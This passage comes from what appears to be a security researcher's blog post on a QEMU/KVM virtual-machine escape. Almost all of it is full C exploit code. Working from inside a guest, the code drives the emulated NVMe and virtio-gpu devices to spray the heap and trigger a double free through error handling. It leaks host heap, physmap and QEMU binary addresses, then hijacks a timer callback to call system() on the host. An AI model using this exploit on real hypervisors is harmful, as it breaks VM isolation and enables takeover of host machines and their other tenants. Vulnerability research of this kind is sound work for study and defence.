uint32_t flags;
uint64_t fence_id;
uint32_t ctx_id;
uint32_t padding;
};

struct virtio_gpu_resource_attach_backing {
struct virtio_gpu_ctrl_hdr hdr;
uint32_t resource_id;
uint32_t nr_entries;
};

struct virtio_gpu_resource_create_2d {
struct virtio_gpu_ctrl_hdr hdr;
uint32_t resource_id;
uint32_t format;
uint32_t width;
uint32_t height;
};

struct virtio_gpu_mem_entry {
uint64_t addr;
uint32_t length;
uint32_t padding;
};

enum NvmeAdminCommands {
NVME_ADM_CMD_DELETE_SQ = 0x00,
NVME_ADM_CMD_CREATE_SQ = 0x01,
NVME_ADM_CMD_GET_LOG_PAGE = 0x02,
NVME_ADM_CMD_DELETE_CQ = 0x04,
NVME_ADM_CMD_CREATE_CQ = 0x05,
NVME_ADM_CMD_IDENTIFY = 0x06,
NVME_ADM_CMD_ABORT = 0x08,
NVME_ADM_CMD_SET_FEATURES = 0x09,
NVME_ADM_CMD_GET_FEATURES = 0x0a,
NVME_ADM_CMD_ASYNC_EV_REQ = 0x0c,
NVME_ADM_CMD_ACTIVATE_FW = 0x10,
NVME_ADM_CMD_DOWNLOAD_FW = 0x11,
NVME_ADM_CMD_FORMAT_NVM = 0x80,
NVME_ADM_CMD_SECURITY_SEND = 0x81,
NVME_ADM_CMD_SECURITY_RECV = 0x82,
};

enum NvmeIoCommands {
NVME_CMD_FLUSH = 0x00,
NVME_CMD_WRITE = 0x01,
NVME_CMD_READ = 0x02,
NVME_CMD_WRITE_UNCOR = 0x04,
NVME_CMD_COMPARE = 0x05,
NVME_CMD_WRITE_ZEROS = 0x08,
NVME_CMD_DSM = 0x09,
};

#define VIRTIO_PCI_COMMON_STATUS 20
#define VIRTIO_PCI_COMMON_Q_SELECT 22
#define VIRTIO_PCI_COMMON_Q_SIZE 24
#define VIRTIO_PCI_COMMON_Q_ENABLE 28
#define VIRTIO_PCI_COMMON_Q_DESCLO 32
#define VIRTIO_PCI_COMMON_Q_DESCHI 36
#define VIRTIO_PCI_COMMON_Q_AVAILLO 40
#define VIRTIO_PCI_COMMON_Q_AVAILHI 44

#define VRING_DESC_F_NEXT 1

#define VIRTIO_GPU_CMD_RESOURCE_CREATE_2D 0x101
#define VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING 0x106

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)

uint32_t page_offset(uint32_t addr)
{
// addr & 0xfff
return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
uint64_t pme, gfn;
size_t offset;
int fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;

gfn = pme & PFN_PFN;
close(fd);
return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

void mmio_nvme_write(uint64_t addr, uint32_t val){
*(uint32_t*)(mmio_nvme + addr) = val;
}

void mmio_gpu_write(uint64_t addr, uint32_t val){
*(uint32_t*)(mmio_gpu + addr) = val;
}

void init_nvme() {
mmio_nvme_write(0x14, 0); // nvme_clear_ctrl
mmio_nvme_write(0x24, 0xff00ff); // n->bar.aqa
mmio_nvme_write(0x28, gva_to_gpa(nvme_cmd));
mmio_nvme_write(0x2c, gva_to_gpa(nvme_cmd) >> 32);

uint32_t data = 1;
data |= 6 << 16; // sqes
data |= 4 << 20; // cqes
mmio_nvme_write(0x14, data); // nvme_start_ctrl
}

void nvme_inc_sq_head(){
sq_tail = sq_tail + 1;
}


void nvme_create_cq(int cqid){
nvme_cmd[sq_tail].opcode = NVME_ADM_CMD_CREATE_CQ;
nvme_cmd[sq_tail].prp1 = gva_to_gpa(nvme_buf);

NvmeCreateCq *nvme_create = (NvmeCreateCq *)(nvme_cmd + sq_tail);
nvme_create->cqid = cqid;
nvme_create->irq_vector = 1;
nvme_create->cq_flags = 1;
nvme_create->qsize = 1;
nvme_inc_sq_head();
}

void nvme_create_sq(int sqid, int qsize){

nvme_cmd[sq_tail].opcode = NVME_ADM_CMD_CREATE_SQ;
nvme_cmd[sq_tail].prp1 = gva_to_gpa(nvme_buf);

NvmeCreateSq *nvme_create = (NvmeCreateSq *)(nvme_cmd + sq_tail);
nvme_create->cqid = 1;
nvme_create->sqid = sqid;
nvme_create->sq_flags = 1;
nvme_create->qsize = qsize;
nvme_inc_sq_head();
}

void nvme_del_sq(int sqid){
nvme_cmd[sq_tail].opcode = NVME_ADM_CMD_DELETE_SQ;
NvmeCreateSq *nvme_del = (NvmeCreateSq *)(nvme_cmd + sq_tail);
nvme_del->sqid = sqid;
nvme_inc_sq_head();
mmio_nvme_write(0x1000, sq_tail);
sleep(0.5);
}

void vuln(int sqid){
memset(nvme_buf, 0, sizeof(struct NvmeCmd));
nvme_cmd[0].opcode = NVME_CMD_READ;
nvme_cmd[0].prp1 = 0xfe000000 + 0xc00;
nvme_cmd[0].nsid = 1;
NvmeRwCmd *rwcmd = (NvmeRwCmd *)(nvme_cmd);
rwcmd->nlb = 7;
rwcmd->slba = 1;
mmio_nvme_write(0x1000 + sqid * 8, 1);
}

void init_gpu(){
mmio_gpu_write(VIRTIO_PCI_COMMON_STATUS, 0);
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_SELECT, 0);
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_SIZE, 0x100);
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_DESCLO, gva_to_gpa(desc));
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_DESCHI, 0);
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_AVAILLO, gva_to_gpa(avail));
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_AVAILHI, 0);
mmio_gpu_write(VIRTIO_PCI_COMMON_Q_ENABLE, 0);
}

void set_mapping_table(){
avail->idx = 2;
avail->ring[vq_last_avail_idx ++] = 0;
avail->ring[vq_last_avail_idx ++] = 1;

struct virtio_gpu_resource_create_2d *c2d = buf + 0x100;
c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D;
c2d->resource_id = 1;
c2d->format = 1;
c2d->width = 0x100;
c2d->height = 0x100;

struct virtio_gpu_resource_attach_backing *ab = buf + 0x200;
ab->hdr.type = VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING;
ab->resource_id = 1;
ab->nr_entries = 20;

struct virtio_gpu_mem_entry *ents = buf + 0x300;
ents[0].addr = gva_to_gpa(payload_buf + 2);
ents[0].length = 0x100;
ents[1].addr = 0;
ents[1].length = 0;

desc[0].flags = 0;
desc[0].addr = gva_to_gpa(c2d);
desc[0].len = sizeof(struct virtio_gpu_resource_create_2d);

desc[1].flags = VRING_DESC_F_NEXT;
desc[1].addr = gva_to_gpa(ab);
desc[1].len = sizeof(struct virtio_gpu_resource_attach_backing);
desc[1].next = 2;
for(int i = 2; i < 20; i++){
desc[i].flags = VRING_DESC_F_NEXT;
desc[i].addr = gva_to_gpa(ents);
desc[i].len = sizeof(struct virtio_gpu_mem_entry);
desc[i].next = i + 1;
}
desc[7].addr = gva_to_gpa(ents + 1);
desc[20].flags = 0;
desc[20].addr = gva_to_gpa(buf + 0x40);
desc[20].len = 0x20;

mmio_gpu_write(0x3000, 0);
}

void set_mapping_table1(){
avail->idx = 3;
avail->ring[vq_last_avail_idx ++] = 0;

struct virtio_gpu_resource_create_2d *c2d = buf + 0x100;
c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D;
c2d->resource_id = 2;
c2d->format = 1;
c2d->width = 0x100;
c2d->height = 0x100;

struct virtio_gpu_resource_attach_backing *ab = buf + 0x200;
ab->hdr.type = VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING;
ab->resource_id = 2;
ab->nr_entries = 20;

desc[0].flags = VRING_DESC_F_NEXT;
desc[0].addr = gva_to_gpa(c2d);
desc[0].len = sizeof(struct virtio_gpu_resource_create_2d);
desc[0].next = 1;
for(int i = 1; i < 21; i++){
desc[i].flags = VRING_DESC_F_NEXT;
desc[i].addr = gva_to_gpa(exec_cmd);
desc[i].len = 0x20;
desc[i].next = i + 1;
}

desc[21].flags = 0;
desc[21].addr = gva_to_gpa(exec_cmd);
desc[21].len = 0x20;

mmio_gpu_write(0x3000, 0);
}

void set_mapping_table2(){
avail->idx = 5;
avail->ring[vq_last_avail_idx ++] = 0;
avail->ring[vq_last_avail_idx ++] = 1;

struct virtio_gpu_resource_create_2d *c2d = buf + 0x100;
c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D;
c2d->resource_id = 3;
c2d->format = 1;
c2d->width = 0x100;
c2d->height = 0x100;

struct virtio_gpu_resource_attach_backing *ab = buf + 0x200;
ab->hdr.type = VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING;
ab->resource_id = 3;
ab->nr_entries = 20;

struct virtio_gpu_mem_entry *ents = buf + 0x300;
ents[0].addr = gva_to_gpa(payload_buf + 2);
ents[0].length = 0x100;
ents[1].addr = 0;
ents[1].length = 0;

desc[0].flags = 0;
desc[0].addr = gva_to_gpa(c2d);
desc[0].len = sizeof(struct virtio_gpu_resource_create_2d);

desc[1].flags = VRING_DESC_F_NEXT;
desc[1].addr = gva_to_gpa(ab);
desc[1].len = sizeof(struct virtio_gpu_resource_attach_backing);
desc[1].next = 2;
for(int i = 2; i < 20; i++){
desc[i].flags = VRING_DESC_F_NEXT;
desc[i].addr = gva_to_gpa(ents);
desc[i].len = sizeof(struct virtio_gpu_mem_entry);
desc[i].next = i + 1;
}
desc[7].addr = gva_to_gpa(ents + 1);
desc[20].flags = 0;
desc[20].addr = gva_to_gpa(buf + 0x40);
desc[20].len = 0x20;

mmio_gpu_write(0x3000, 0);
}

int main(){
int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
mmio_nvme = mmap(0, 0x2000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
int mmio_fd1 = open("/sys/devices/pci0000:00/0000:00:05.0/resource4", O_RDWR | O_SYNC);
mmio_gpu = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd1, 0);

buf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
memset(buf, 0, 0x1000);
avail = buf;
payload_buf = buf + 0x400;

desc_buf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
memset(desc_buf, 0, 0x1000);
desc = desc_buf;

nvme_buf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
memset(nvme_buf, 0, 0x1000);
nvme_cmd = nvme_buf;

puts("[*] STEP 1 heap spray");
init_nvme();
sleep(1);
for(int i = 1; i < 0x28; ++i){
nvme_create_cq(i);
}
mmio_nvme_write(0x1000, sq_tail);
sleep(1);

puts("[*] STEP 2 set mapping table for free");
init_gpu();
set_mapping_table();
sleep(1);
//本地初始0x150的tcache只有4个,g_free(ents)后ents也会进入,所以需要多创建一个sq
nvme_create_sq(1, 1);
nvme_create_sq(2, 1);
mmio_nvme_write(0x1000, sq_tail);
sleep(1);

puts("[*] STEP 3 free the vuln_addr");
payload_buf[1] = 0x291;
payload_buf[0x53] = 0x21;
vuln(2);
sleep(1);
size_t leak_heap_addr = payload_buf[2];
printf("[*] leak_heap_addr_is %#lx\n", leak_heap_addr);

puts("[*] STEP 4 leak host's physmap addr in qemu");
set_mapping_table1();
sleep(1);
size_t physmap_addr = payload_buf[0x28];
size_t physmap_base = physmap_addr - gva_to_gpa(exec_cmd);
printf("[*] leak_host_physmap_addr_is %#lx\n", physmap_addr);
sleep(1);

puts("[*] STEP 5 free vuln_addr");
payload_buf = buf + 0x800;
set_mapping_table2();
nvme_create_sq(3, 1);
nvme_create_sq(4, 1);
mmio_nvme_write(0x1000, sq_tail);
sleep(1);
payload_buf[1] = 0x41;
payload_buf[9] = 0x21;
vuln(4);
sleep(1);
nvme_create_sq(5, 1);
mmio_nvme_write(0x1000, sq_tail);
sleep(1);

puts("[*] STEP 6 leak qemu addr and hijack timer");
size_t elf_addr = payload_buf[4];
size_t elf_base = elf_addr - 0x517c76;
size_t system_plt = elf_base + 0x2bc790;
printf("[*] leak_elf_addr_is %#lx\n", elf_addr);
payload_buf[4] = system_plt;
payload_buf[5] = physmap_addr;
puts("[*] start escape");
mmio_nvme_write(0x1000 + 5 * 8, 1);
}

最后弹出计算器


Misuse Error Handling Leading To QEMU/KVM Escape
https://xtxtn.github.io/2023/10/12/ErrorHandling/
作者
xtxtn
发布于
2023年10月12日
更新于
2024年1月19日
许可协议